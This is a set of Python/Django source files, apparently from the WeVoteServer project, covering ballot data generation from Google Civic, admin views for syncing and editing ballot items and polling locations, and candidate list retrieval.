'status': "BALLOT_NOT_FOUND_OR_GENERATED-SUFFICIENT_ADDRESS_PROBABLY_MISSING",
'success': True,
'google_civic_election_id': google_civic_election_id,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None,
}
return results
def generate_ballot_data(voter_device_link, voter_address):
voter_device_id = voter_device_link.voter_device_id
voter_id = voter_device_link.voter_id
voter_ballot_saved_manager = VoterBallotSavedManager()
if not positive_value_exists(voter_id):
results = {
'status': "VOTER_NOT_FOUND_FROM_VOTER_DEVICE_ID",
'success': False,
'google_civic_election_id': 0,
'voter_ballot_saved_found': False,
'voter_ballot_saved': VoterBallotSaved()
}
return results
# If not even a partial address exists, exit because we can't generate a ballot without an address
if not positive_value_exists(voter_address.text_for_map_search):
results = {
'status': "VOTER_ADDRESS_BLANK",
'success': True,
'google_civic_election_id': 0,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None,
}
return results
# 1) Get ballot data from Google Civic for the actual VoterAddress
text_for_map_search = voter_address.text_for_map_search
use_test_election = False
results = voter_ballot_items_retrieve_from_google_civic_for_api(voter_device_id, text_for_map_search,
use_test_election)
if results['google_civic_election_id']:
is_from_substituted_address = False
substituted_address_nearby = ''
is_from_test_address = False
# We update the voter_address with this google_civic_election_id outside of this function
# Save the meta information for this ballot data
save_results = voter_ballot_saved_manager.create_voter_ballot_saved(
voter_id,
results['google_civic_election_id'],
results['election_date_text'],
results['election_description_text'],
results['text_for_map_search'],
substituted_address_nearby,
is_from_substituted_address,
is_from_test_address
)
results = {
'status': save_results['status'],
'success': save_results['success'],
'google_civic_election_id': save_results['google_civic_election_id'],
'voter_ballot_saved_found': save_results['voter_ballot_saved_found'],
'voter_ballot_saved': save_results['voter_ballot_saved'],
}
return results
# 2) Copy ballot data from a nearby address, previously retrieved from Google Civic and cached within We Vote
copy_results = copy_existing_ballot_items_from_stored_ballot(voter_id, text_for_map_search)
if copy_results['ballot_returned_copied']:
is_from_substituted_address = True
is_from_test_address = False
save_results = voter_ballot_saved_manager.create_voter_ballot_saved(
voter_id,
copy_results['google_civic_election_id'],
copy_results['election_date_text'],
copy_results['election_description_text'],
text_for_map_search,
copy_results['substituted_address_nearby'],
is_from_substituted_address,
is_from_test_address
)
results = {
'status': save_results['status'],
'success': save_results['success'],
'google_civic_election_id': save_results['google_civic_election_id'],
'voter_ballot_saved_found': save_results['voter_ballot_saved_found'],
'voter_ballot_saved': save_results['voter_ballot_saved'],
}
return results
# 3) Get test ballot data from Google Civic
use_test_election = True
results = voter_ballot_items_retrieve_from_google_civic_for_api(voter_device_id, text_for_map_search,
use_test_election)
if results['google_civic_election_id']:
is_from_substituted_address = False
substituted_address_nearby = ''
is_from_test_address = True
# Since this is a test address, we don't want to save the google_civic_election_id (of 2000)
# with the voter_address
save_results = voter_ballot_saved_manager.create_voter_ballot_saved(
voter_id,
results['google_civic_election_id'],
results['election_date_text'],
results['election_description_text'],
results['text_for_map_search'],
substituted_address_nearby,
is_from_substituted_address,
is_from_test_address
)
results = {
'status': save_results['status'],
'success': save_results['success'],
'google_civic_election_id': save_results['google_civic_election_id'],
'voter_ballot_saved_found': save_results['voter_ballot_saved_found'],
'voter_ballot_saved': save_results['voter_ballot_saved'],
}
return results
results = {
'status': "UNABLE_TO_GENERATE_BALLOT_DATA",
'success': True,
'google_civic_election_id': 0,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None,
}
return results
def choose_election_from_existing_data(voter_device_link, google_civic_election_id, voter_address):
voter_id = voter_device_link.voter_id
voter_ballot_saved_manager = VoterBallotSavedManager()
# If a google_civic_election_id was passed in, then we simply return the ballot that was saved
if positive_value_exists(google_civic_election_id):
voter_ballot_saved_results = voter_ballot_saved_manager.retrieve_voter_ballot_saved_by_voter_id(
voter_id, google_civic_election_id)
if voter_ballot_saved_results['voter_ballot_saved_found']:
voter_ballot_saved = voter_ballot_saved_results['voter_ballot_saved']
results = {
'status': "",
'success': True,
'google_civic_election_id': voter_ballot_saved.google_civic_election_id,
'voter_ballot_saved_found': True,
'voter_ballot_saved': voter_ballot_saved
}
return results
else:
# If here, then we expected a VoterBallotSaved entry for this voter, but didn't find it
pass
if positive_value_exists(voter_device_link.google_civic_election_id):
voter_ballot_saved_results = voter_ballot_saved_manager.retrieve_voter_ballot_saved_by_voter_id(
voter_id, voter_device_link.google_civic_election_id)
if voter_ballot_saved_results['voter_ballot_saved_found']:
voter_ballot_saved = voter_ballot_saved_results['voter_ballot_saved']
results = {
'status': "VOTER_BALLOT_SAVED_FOUND_FROM_VOTER_DEVICE_LINK",
'success': True,
'google_civic_election_id': voter_ballot_saved.google_civic_election_id,
'voter_ballot_saved_found': True,
'voter_ballot_saved': voter_ballot_saved
}
return results
else:
# If here, then we expected a VoterBallotSaved entry, but didn't find it. Unable to repair the data
pass
if voter_address.google_civic_election_id is None:
voter_address_google_civic_election_id = 0
else:
voter_address_google_civic_election_id = voter_address.google_civic_election_id
voter_address_google_civic_election_id = convert_to_int(voter_address_google_civic_election_id)
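# Note: election id 2000 appears to be the Google Civic test election (see
# generate_ballot_data above), so an address pinned to it is skipped below.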
if positive_value_exists(voter_address_google_civic_election_id) \
and voter_address_google_civic_election_id != 2000:
# If we have already linked an address to a VoterBallotSaved entry, use this
voter_ballot_saved_results = voter_ballot_saved_manager.retrieve_voter_ballot_saved_by_voter_id(
voter_id, voter_address_google_civic_election_id)
if voter_ballot_saved_results['voter_ballot_saved_found']:
voter_ballot_saved = voter_ballot_saved_results['voter_ballot_saved']
results = {
'status': "VOTER_BALLOT_SAVED_FOUND_FROM_VOTER_ADDRESS",
'success': True,
'google_civic_election_id': voter_ballot_saved.google_civic_election_id,
'voter_ballot_saved_found': True,
'voter_ballot_saved': voter_ballot_saved
}
return results
else:
# If here, then we expected a VoterBallotSaved entry, but didn't find it. Unable to repair the data
pass
error_results = {
'status': "VOTER_BALLOT_SAVED_NOT_FOUND_FROM_EXISTING_DATA",
'success': True,
'google_civic_election_id': 0,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None
}
return error_results
def voter_ballot_items_retrieve_for_one_election_for_api(voter_device_id, voter_id, google_civic_election_id):
"""
:param voter_device_id:
:param voter_id:
:param google_civic_election_id: This variable was passed in explicitly so we can
get the ballot items related to that election.
:return:
"""
ballot_item_list_manager = BallotItemListManager()
ballot_item_list = []
ballot_items_to_display = []
try:
results = ballot_item_list_manager.retrieve_all_ballot_items_for_voter(voter_id, google_civic_election_id)
success = results['success']
status = results['status']
ballot_item_list = results['ballot_item_list']
except Exception as e:
status = 'FAILED voter_ballot_items_retrieve. ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(e, logger=logger, exception_message=status)
success = False
if success:
for ballot_item in ballot_item_list:
if ballot_item.contest_office_we_vote_id:
kind_of_ballot_item = OFFICE
ballot_item_id = ballot_item.contest_office_id
we_vote_id = ballot_item.contest_office_we_vote_id
try:
candidate_list_object = CandidateCampaignListManager()
results = candidate_list_object.retrieve_all_candidates_for_office(ballot_item_id, we_vote_id)
candidates_to_display = []
if results['candidate_list_found']:
candidate_list = results['candidate_list']
for candidate in candidate_list:
# This should match values returned in candidates_retrieve_for_api
one_candidate = {
'id': candidate.id,
'we_vote_id': candidate.we_vote_id,
'ballot_item_display_name': candidate.display_candidate_name(),
'candidate_photo_url': candidate.candidate_photo_url(),
'party': candidate.political_party_display(),
'order_on_ballot': candidate.order_on_ballot,
'kind_of_ballot_item': CANDIDATE,
'twitter_handle': candidate.candidate_twitter_handle,
'twitter_description': candidate.twitter_description,
'twitter_followers_count': candidate.twitter_followers_count,
}
candidates_to_display.append(one_candidate.copy())
except Exception as e:
# status = 'FAILED candidates_retrieve. ' \
# '{error} [type: {error_type}]'.format(error=e.message, error_type=type(e))
candidates_to_display = []
one_ballot_item = {
'ballot_item_display_name': ballot_item.ballot_item_display_name,
'google_civic_election_id': ballot_item.google_civic_election_id,
'google_ballot_placement': ballot_item.google_ballot_placement,
'local_ballot_order': ballot_item.local_ballot_order,
'kind_of_ballot_item': kind_of_ballot_item,
'id': ballot_item_id,
'we_vote_id': we_vote_id,
'candidate_list': candidates_to_display,
}
ballot_items_to_display.append(one_ballot_item.copy())
elif ballot_item.contest_measure_we_vote_id:
kind_of_ballot_item = MEASURE
ballot_item_id = ballot_item.contest_measure_id
we_vote_id = ballot_item.contest_measure_we_vote_id
one_ballot_item = {
'ballot_item_display_name': ballot_item.ballot_item_display_name,
'google_civic_election_id': ballot_item.google_civic_election_id,
'google_ballot_placement': ballot_item.google_ballot_placement,
'local_ballot_order': ballot_item.local_ballot_order,
'measure_subtitle': ballot_item.measure_subtitle,
'kind_of_ballot_item': kind_of_ballot_item,
'id': ballot_item_id,
'we_vote_id': we_vote_id,
}
ballot_items_to_display.append(one_ballot_item.copy())
results = {
'status': 'VOTER_BALLOT_ITEMS_RETRIEVED',
'success': True,
'voter_device_id': voter_device_id,
'ballot_item_list': ballot_items_to_display,
'google_civic_election_id': google_civic_election_id,
}
else:
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'ballot_item_list': [],
'google_civic_election_id': google_civic_election_id,
}
return results
def ballot_item_options_retrieve_for_api(google_civic_election_id=0):
"""
This function returns a normalized list of candidates and measures so we can pre-populate form fields.
Not specific to one voter.
:param google_civic_election_id:
:return:
"""
status = ""
try:
candidate_list_object = CandidateCampaignListManager()
results = candidate_list_object.retrieve_all_candidates_for_upcoming_election(google_civic_election_id)
candidate_success = results['success']
status += results['status']
candidate_list = results['candidate_list_light']
except Exception as e:
status += 'FAILED ballot_item_options_retrieve_for_api, candidate_list. ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(e, logger=logger, exception_message=status)
candidate_list = []
candidate_success = False
try:
office_list_object = ContestOfficeListManager()
results = office_list_object.retrieve_all_offices_for_upcoming_election(google_civic_election_id)
office_success = results['success']
status += ' ' + results['status']
office_list = results['office_list_light']
except Exception as e:
status += 'FAILED ballot_item_options_retrieve_for_api, office_list. ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(e, logger=logger, exception_message=status)
office_list = []
office_success = False
try:
measure_list_object = ContestMeasureList()
results = measure_list_object.retrieve_all_measures_for_upcoming_election(google_civic_election_id)
measure_success = results['success']
status += ' ' + results['status']
measure_list = results['measure_list_light']
except Exception as e:
status += 'FAILED ballot_item_options_retrieve_for_api, measure_list. ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(e, logger=logger, exception_message=status)
measure_list = []
measure_success = False
ballot_items_to_display = []
if candidate_success and len(candidate_list):
for candidate in candidate_list:
ballot_items_to_display.append(candidate.copy())
if office_success and len(office_list):
for office in office_list:
ballot_items_to_display.append(office.copy())
if measure_success and len(measure_list):
for measure in measure_list:
ballot_items_to_display.append(measure.copy())
json_data = {
'status': status,
'success': candidate_success or measure_success,
'ballot_item_list': ballot_items_to_display,
'google_civic_election_id': google_civic_election_id,
}
results = {
'status': status,
'success': candidate_success or measure_success,
'google_civic_election_id': google_civic_election_id, # We want to save google_civic_election_id in cookie
'json_data': json_data,
}
return results
```
#### File: WeVoteServer/ballot/views_admin.py
```python
from .controllers import ballot_items_import_from_master_server, ballot_returned_import_from_master_server
from .models import BallotItem, BallotItemListManager, BallotItemManager, BallotReturned, BallotReturnedManager
from .serializers import BallotItemSerializer, BallotReturnedSerializer
from admin_tools.views import redirect_to_sign_in_page
from office.models import ContestOffice, ContestOfficeManager
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.messages import get_messages
from django.shortcuts import render
from election.models import Election, ElectionManager
from geopy.geocoders import get_geocoder_for_service
from measure.models import ContestMeasure, ContestMeasureManager
from polling_location.models import PollingLocation, PollingLocationManager
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import voter_has_authority
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
# This page does not need to be protected.
class BallotItemsSyncOutView(APIView):
def get(self, request, format=None):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
ballot_item_list = BallotItem.objects.all()
# We only want BallotItem values associated with polling locations
ballot_item_list = ballot_item_list.exclude(polling_location_we_vote_id__isnull=True).exclude(
polling_location_we_vote_id__exact='')
if positive_value_exists(google_civic_election_id):
ballot_item_list = ballot_item_list.filter(google_civic_election_id=google_civic_election_id)
serializer = BallotItemSerializer(ballot_item_list, many=True)
return Response(serializer.data)
# This page does not need to be protected.
class BallotReturnedSyncOutView(APIView):
def get(self, request, format=None):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
ballot_returned_list = BallotReturned.objects.all()
# We only want BallotReturned values associated with polling locations
ballot_returned_list = ballot_returned_list.exclude(polling_location_we_vote_id__isnull=True).exclude(
polling_location_we_vote_id__exact='')
if positive_value_exists(google_civic_election_id):
ballot_returned_list = ballot_returned_list.filter(google_civic_election_id=google_civic_election_id)
serializer = BallotReturnedSerializer(ballot_returned_list, many=True)
return Response(serializer.data)
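# Example sync-out requests (the host is hypothetical; the slugs match the
# documentation templates above):
#   GET https://master.example.org/apis/v1/ballotItemsSyncOut/?format=json&google_civic_election_id=4162
#   GET https://master.example.org/apis/v1/ballotReturnedSyncOut/?format=json&google_civic_election_id=4162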
@login_required
def ballot_items_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = ballot_items_import_from_master_server(request, google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Ballot Items import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def ballot_returned_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = ballot_returned_import_from_master_server(request, google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Ballot Returned import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def ballot_item_list_edit_view(request, ballot_returned_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
# We can accept either, but give preference to polling_location_id
polling_location_id = request.GET.get('polling_location_id', 0)
polling_location_we_vote_id = request.GET.get('polling_location_we_vote_id', '')
polling_location_city = request.GET.get('polling_location_city', '')
polling_location_zip = request.GET.get('polling_location_zip', '')
ballot_returned_found = False
ballot_returned = BallotReturned()
ballot_returned_manager = BallotReturnedManager()
results = ballot_returned_manager.retrieve_existing_ballot_returned_by_identifier(ballot_returned_id)
if results['ballot_returned_found']:
ballot_returned = results['ballot_returned']
ballot_returned_found = True
google_civic_election_id = ballot_returned.google_civic_election_id
else:
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
google_civic_election_id = convert_to_int(google_civic_election_id)
election = Election()
election_state = ''
contest_measure_list = []
contest_office_list = []
if google_civic_election_id:
election_manager = ElectionManager()
results = election_manager.retrieve_election(google_civic_election_id)
if results['election_found']:
election = results['election']
election_state = election.get_election_state()
# Get a list of offices for this election so we can create drop downs
try:
contest_office_list = ContestOffice.objects.order_by('office_name')
contest_office_list = contest_office_list.filter(google_civic_election_id=google_civic_election_id)
except Exception as e:
contest_office_list = []
# Get a list of measures for this election so we can create drop downs
try:
contest_measure_list = ContestMeasure.objects.order_by('measure_title')
contest_measure_list = contest_measure_list.filter(google_civic_election_id=google_civic_election_id)
except Exception as e:
contest_measure_list = []
else:
messages.add_message(request, messages.ERROR, 'In order to create a \'ballot_returned\' entry, '
'a google_civic_election_id is required.')
polling_location_found = False
polling_location = PollingLocation()
polling_location_manager = PollingLocationManager()
if positive_value_exists(polling_location_id):
results = polling_location_manager.retrieve_polling_location_by_id(polling_location_id)
if results['polling_location_found']:
polling_location = results['polling_location']
polling_location_found = True
if not polling_location_found and positive_value_exists(polling_location_we_vote_id):
results = polling_location_manager.retrieve_polling_location_by_id(0, polling_location_we_vote_id)
if results['polling_location_found']:
polling_location = results['polling_location']
polling_location_found = True
polling_location_list = []
if not polling_location_found:
results = polling_location_manager.retrieve_polling_locations_in_city_or_state(
election_state, polling_location_city, polling_location_zip)
if results['polling_location_list_found']:
polling_location_list = results['polling_location_list']
messages_on_stage = get_messages(request)
ballot_item_list = []
if ballot_returned_found:
# Get a list of ballot_items stored at this location
ballot_item_list_manager = BallotItemListManager()
if positive_value_exists(ballot_returned.polling_location_we_vote_id):
results = ballot_item_list_manager.retrieve_all_ballot_items_for_polling_location(
ballot_returned.polling_location_we_vote_id, google_civic_election_id)
if results['ballot_item_list_found']:
ballot_item_list = results['ballot_item_list']
template_values = {
'messages_on_stage': messages_on_stage,
'ballot_returned': ballot_returned,
'ballot_returned_id': ballot_returned_id,
'election': election,
'measure_list': contest_measure_list,
'office_list': contest_office_list,
'polling_location_we_vote_id': polling_location_we_vote_id,
'polling_location_found': polling_location_found,
'polling_location': polling_location,
'polling_location_list': polling_location_list,
'polling_location_city': polling_location_city,
'polling_location_zip': polling_location_zip,
'ballot_item_list': ballot_item_list,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'ballot/ballot_item_list_edit.html', template_values)
@login_required
def ballot_item_list_edit_process_view(request):
"""
Process the new or edit ballot form
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
ballot_returned_id = convert_to_int(request.POST.get('ballot_returned_id', 0))
google_civic_election_id = request.POST.get('google_civic_election_id', 0)
polling_location_id = convert_to_int(request.POST.get('polling_location_id', 0))
polling_location_city = request.POST.get('polling_location_city', '')
polling_location_zip = request.POST.get('polling_location_zip', '')
contest_office1_id = request.POST.get('contest_office1_id', 0)
contest_office1_order = request.POST.get('contest_office1_order', 0)
contest_measure1_id = request.POST.get('contest_measure1_id', 0)
election_local_id = 0
# Find existing ballot_returned
ballot_returned_found = False
ballot_returned = BallotReturned()
if positive_value_exists(ballot_returned_id):
try:
ballot_returned_query = BallotReturned.objects.filter(id=ballot_returned_id)
if len(ballot_returned_query):
ballot_returned = ballot_returned_query[0]
ballot_returned_found = True
except Exception as e:
pass
election_manager = ElectionManager()
polling_location_manager = PollingLocationManager()
polling_location = PollingLocation()
polling_location_found = False
try:
if ballot_returned_found:
# Update
# Check to see if this is a We Vote-created election
            is_we_vote_google_civic_election_id = \
                convert_to_int(ballot_returned.google_civic_election_id) >= 1000000
results = election_manager.retrieve_election(ballot_returned.google_civic_election_id)
if results['election_found']:
election = results['election']
election_local_id = election.id
# polling_location must be found
# We cannot change a polling location once saved, so we ignore the incoming polling_location_id here
results = polling_location_manager.retrieve_polling_location_by_id(
0, ballot_returned.polling_location_we_vote_id)
if results['polling_location_found']:
polling_location = results['polling_location']
polling_location_found = True
else:
# Create new ballot_returned entry
# election must be found
election_results = election_manager.retrieve_election(google_civic_election_id)
if election_results['election_found']:
election = election_results['election']
election_local_id = election.id
state_code = election.get_election_state()
else:
messages.add_message(request, messages.ERROR, 'Could not find election -- '
'required to save ballot_returned.')
return HttpResponseRedirect(reverse('ballot:ballot_item_list_edit', args=(ballot_returned_id,)) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&polling_location_id=" + str(polling_location_id) +
"&polling_location_city=" + polling_location_city +
"&polling_location_zip=" + str(polling_location_zip)
)
# polling_location must be found
if positive_value_exists(polling_location_id):
results = polling_location_manager.retrieve_polling_location_by_id(polling_location_id)
if results['polling_location_found']:
polling_location = results['polling_location']
polling_location_found = True
if not polling_location_found:
messages.add_message(request, messages.ERROR, 'Could not find polling_location -- '
'required to save ballot_returned.')
return HttpResponseRedirect(reverse('ballot:ballot_item_list_edit', args=(ballot_returned_id,)) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&polling_location_id=" + str(polling_location_id) +
"&polling_location_city=" + polling_location_city +
"&polling_location_zip=" + str(polling_location_zip)
)
ballot_returned = BallotReturned(
election_date=election.election_day_text,
election_description_text=election.election_name,
google_civic_election_id=google_civic_election_id,
polling_location_we_vote_id=polling_location.we_vote_id,
normalized_city=polling_location.city,
normalized_line1=polling_location.line1,
normalized_line2=polling_location.line2,
normalized_state=polling_location.state,
normalized_zip=polling_location.get_formatted_zip(),
text_for_map_search=polling_location.get_text_for_map_search(),
)
ballot_returned.save()
ballot_returned_id = ballot_returned.id
ballot_returned_found = True
messages.add_message(request, messages.INFO, 'New ballot_returned saved.')
# #######################################
# Make sure we have saved a latitude and longitude for the ballot_returned entry
if ballot_returned_found and positive_value_exists(ballot_returned.text_for_map_search):
if not ballot_returned.latitude or not ballot_returned.longitude:
google_client = get_geocoder_for_service('google')()
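            # geocode the text address; get_geocoder_for_service is part of the geopy library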
location = google_client.geocode(ballot_returned.text_for_map_search)
if location is None:
status = 'Could not find location matching "{}"'.format(ballot_returned.text_for_map_search)
else:
ballot_returned.latitude = location.latitude
ballot_returned.longitude = location.longitude
ballot_returned.save()
# #######################################
# Now create new ballot_item entries
# Contest Office 1
ballot_item_manager = BallotItemManager()
contest_office_manager = ContestOfficeManager()
results = contest_office_manager.retrieve_contest_office(contest_office1_id)
if results['contest_office_found']:
contest_office = results['contest_office']
ballot_item_display_name = contest_office.office_name
google_ballot_placement = 0
measure_subtitle = ''
local_ballot_order = contest_office1_order if positive_value_exists(contest_office1_order) else 0
results = ballot_item_manager.update_or_create_ballot_item_for_polling_location(
polling_location.we_vote_id, google_civic_election_id, google_ballot_placement,
ballot_item_display_name, measure_subtitle, local_ballot_order,
contest_office.id, contest_office.we_vote_id)
if results['new_ballot_item_created']:
messages.add_message(request, messages.INFO, 'Office 1 added.')
else:
messages.add_message(request, messages.ERROR, 'Office 1 could not be added.')
# Contest Measure 1
ballot_item_manager = BallotItemManager()
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure(contest_measure1_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
google_ballot_placement = 0
ballot_item_display_name = contest_measure.measure_title
contest_office_id = 0
contest_office_we_vote_id = ''
local_ballot_order = 0
ballot_item_manager.update_or_create_ballot_item_for_polling_location(
polling_location.we_vote_id, google_civic_election_id, google_ballot_placement,
ballot_item_display_name, contest_measure.measure_subtitle, local_ballot_order,
contest_office_id, contest_office_we_vote_id,
contest_measure.id)
except Exception as e:
messages.add_message(request, messages.ERROR, 'Could not save ballot_returned.')
return HttpResponseRedirect(reverse('ballot:ballot_item_list_edit', args=(ballot_returned_id,)) +
"?google_civic_election_id=" + str(google_civic_election_id) +
"&polling_location_id=" + str(polling_location_id) +
"&polling_location_city=" + polling_location_city +
"&polling_location_zip=" + str(polling_location_zip)
)
```
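A minimal usage sketch (not part of the repository) of driving the edit-process view above with Django's test client. The URL name `ballot:ballot_item_list_edit_process` and the pre-authenticated session are assumptions; the form field names come directly from the view.
```python
# Hypothetical sketch: assumes a URL named 'ballot:ballot_item_list_edit_process'
# and a client session already signed in with 'verified_volunteer' authority.
from django.core.urlresolvers import reverse
from django.test import Client

client = Client()
response = client.post(reverse('ballot:ballot_item_list_edit_process'), {
    'ballot_returned_id': 0,              # 0 means "create a new ballot_returned entry"
    'google_civic_election_id': 1000001,  # ids >= 1000000 are treated as We Vote-created elections
    'polling_location_id': 42,            # placeholder; must match an existing PollingLocation
    'contest_office1_id': 7,              # placeholder office to attach as a ballot item
    'contest_office1_order': 1,
    'contest_measure1_id': 0,
})
# On success or failure the view redirects back to the ballot_item_list_edit page
```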
#### File: WeVoteServer/candidate/models.py
```python
from django.db import models
from django.db.models import Q
from election.models import Election
from exception.models import handle_exception, handle_record_found_more_than_one_exception
from office.models import ContestOffice, ContestOfficeManager
import re
from wevote_settings.models import fetch_next_we_vote_id_last_candidate_campaign_integer, fetch_site_unique_id_prefix
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, display_full_name_with_correct_capitalization, \
extract_first_name_from_full_name, \
extract_last_name_from_full_name, extract_state_from_ocd_division_id, extract_twitter_handle_from_text_string, \
positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
class CandidateCampaignListManager(models.Model):
"""
This is a class to make it easy to retrieve lists of Candidates
"""
def retrieve_all_candidates_for_office(self, office_id, office_we_vote_id):
candidate_list = []
candidate_list_found = False
if not positive_value_exists(office_id) and not positive_value_exists(office_we_vote_id):
status = 'VALID_OFFICE_ID_AND_OFFICE_WE_VOTE_ID_MISSING'
results = {
                'success': candidate_list_found,
'status': status,
'office_id': office_id,
'office_we_vote_id': office_we_vote_id,
'candidate_list_found': candidate_list_found,
'candidate_list': candidate_list,
}
return results
try:
candidate_queryset = CandidateCampaign.objects.all()
if positive_value_exists(office_id):
candidate_queryset = candidate_queryset.filter(contest_office_id=office_id)
elif positive_value_exists(office_we_vote_id):
candidate_queryset = candidate_queryset.filter(contest_office_we_vote_id=office_we_vote_id)
candidate_queryset = candidate_queryset.order_by('-twitter_followers_count')
candidate_list = candidate_queryset
if len(candidate_list):
candidate_list_found = True
status = 'CANDIDATES_RETRIEVED'
else:
status = 'NO_CANDIDATES_RETRIEVED'
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_CANDIDATES_FOUND_DoesNotExist'
candidate_list = []
except Exception as e:
handle_exception(e, logger=logger)
            status = 'FAILED retrieve_all_candidates_for_office ' \
                     '{error} [type: {error_type}]'.format(error=e, error_type=type(e))
results = {
            'success': candidate_list_found,
'status': status,
'office_id': office_id,
'office_we_vote_id': office_we_vote_id,
'candidate_list_found': candidate_list_found,
'candidate_list': candidate_list,
}
return results
def retrieve_all_candidates_for_upcoming_election(self, google_civic_election_id=0,
return_list_of_objects=False):
candidate_list_objects = []
candidate_list_light = []
candidate_list_found = False
try:
candidate_queryset = CandidateCampaign.objects.all()
if positive_value_exists(google_civic_election_id):
candidate_queryset = candidate_queryset.filter(google_civic_election_id=google_civic_election_id)
else:
# TODO Limit this search to upcoming_elections only
pass
candidate_queryset = candidate_queryset.order_by("candidate_name")
if positive_value_exists(google_civic_election_id):
candidate_list_objects = candidate_queryset
else:
candidate_list_objects = candidate_queryset[:300]
if len(candidate_list_objects):
candidate_list_found = True
status = 'CANDIDATES_RETRIEVED'
success = True
else:
status = 'NO_CANDIDATES_RETRIEVED'
success = True
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_CANDIDATES_FOUND_DoesNotExist'
candidate_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
            status = 'FAILED retrieve_all_candidates_for_upcoming_election ' \
                     '{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
if candidate_list_found:
for candidate in candidate_list_objects:
one_candidate = {
'ballot_item_display_name': candidate.display_candidate_name(),
'candidate_we_vote_id': candidate.we_vote_id,
'office_we_vote_id': candidate.contest_office_we_vote_id,
'measure_we_vote_id': '',
}
candidate_list_light.append(one_candidate.copy())
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'candidate_list_found': candidate_list_found,
'candidate_list_objects': candidate_list_objects if return_list_of_objects else [],
'candidate_list_light': candidate_list_light,
}
return results
def retrieve_candidate_count_for_office(self, office_id, office_we_vote_id):
if not positive_value_exists(office_id) and not positive_value_exists(office_we_vote_id):
status = 'VALID_OFFICE_ID_AND_OFFICE_WE_VOTE_ID_MISSING'
results = {
'success': False,
'status': status,
'office_id': office_id,
'office_we_vote_id': office_we_vote_id,
'candidate_count': 0,
}
return results
try:
candidate_queryset = CandidateCampaign.objects.all()
if positive_value_exists(office_id):
candidate_queryset = candidate_queryset.filter(contest_office_id=office_id)
elif positive_value_exists(office_we_vote_id):
candidate_queryset = candidate_queryset.filter(contest_office_we_vote_id=office_we_vote_id)
candidate_list = candidate_queryset
candidate_count = candidate_list.count()
success = True
status = "CANDIDATE_COUNT_FOUND"
except CandidateCampaign.DoesNotExist:
# No candidates found. Not a problem.
status = 'NO_CANDIDATES_FOUND_DoesNotExist'
candidate_count = 0
success = True
except Exception as e:
handle_exception(e, logger=logger)
            status = 'FAILED retrieve_candidate_count_for_office ' \
                     '{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
candidate_count = 0
results = {
'success': success,
'status': status,
'office_id': office_id,
'office_we_vote_id': office_we_vote_id,
'candidate_count': candidate_count,
}
return results
def is_automatic_merge_ok(self, candidate_option1, candidate_option2):
automatic_merge_ok = True
status = ""
if candidate_option1.candidate_name != candidate_option2.candidate_name:
automatic_merge_ok = False
status += " candidate_name:"
if candidate_option1.candidate_twitter_handle != candidate_option2.candidate_twitter_handle:
automatic_merge_ok = False
status += " candidate_twitter_handle:"
if candidate_option1.candidate_url != candidate_option2.candidate_url:
automatic_merge_ok = False
status += " candidate_url:"
if not automatic_merge_ok:
status = "Different: " + status
results = {
"status": status,
"automatic_merge_ok": automatic_merge_ok,
}
return results
def do_automatic_merge(self, candidate_option1, candidate_option2):
success = False
status = "do_automatic_merge NOT IMPLEMENTED YET"
results = {
'success': success,
